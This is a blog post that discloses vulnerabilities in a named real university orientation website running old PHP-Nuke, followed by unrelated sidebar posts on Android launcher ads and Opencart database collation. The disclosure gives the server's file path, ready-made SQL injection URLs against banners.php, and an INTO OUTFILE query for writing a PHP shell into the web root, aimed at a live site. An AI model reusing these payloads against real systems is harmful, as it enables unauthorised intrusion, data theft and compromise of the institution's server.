Skip to main content

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise



http://www.orientamento.unisannio.it
The website uses phpnuke with some customizations (sometimes it detects that we are trying to abuse of specific bugs)

we can find the path from the Deprecated notices in various modules
/var/www/html/copus/home/copus/modules/

ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25

register_globals seems to be On and the variables can be replaced by using post/get requests.

Supposed version <=PHP-Nuke-6.9 since banners.php exists

In banners.php we have

switch($op) { ... }
sample
http://www.orientamento.unisannio.it/banners.php?op=login

By using, for example, this url:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the sql is executed and we can dump the data instead of the banners

File via sql
http://www.orientamento.unisannio.it/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'/var/www/html/copus/home/copus/[anyfilename.any]

Sql injection via post. (registration is required). It's possible to upload files/phpshell with a specific query (INTO OUTFILE) and by knowing the path (see above).
http://www.orientamento.unisannio.it/modules.php?name=Your_Account&op=activate&username=[existentaccountname]


There are several other common problems.

Comments

Post a Comment

Popular posts from this blog

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      
Post a Comment
Read more

Database Collation when installing Opencart 3.x, 4.x

  To avoid several problems the database collation for opencart should be as follows: - for Opencart 4.0.1.1 and above it should be " utf8mb4_general_ci " - for Opencart 1.5.51 (Opencart  2.x, Opencart 3.x ) up to Opencart 4.0.1.0 the collation should be " utf8_general_ci " - for Opencart 1.4.1 up to Opencart 1.5.4.1 the collation should be " utf8_bin " - for Opencart <1.1.1 up to Opencart 1.4.0 the collation should be " utf8_unicode_ci " If you are using the latest version of mysql always use " utf8mb4_general_ci ". Never use UTF8mb3*
Post a Comment
Read more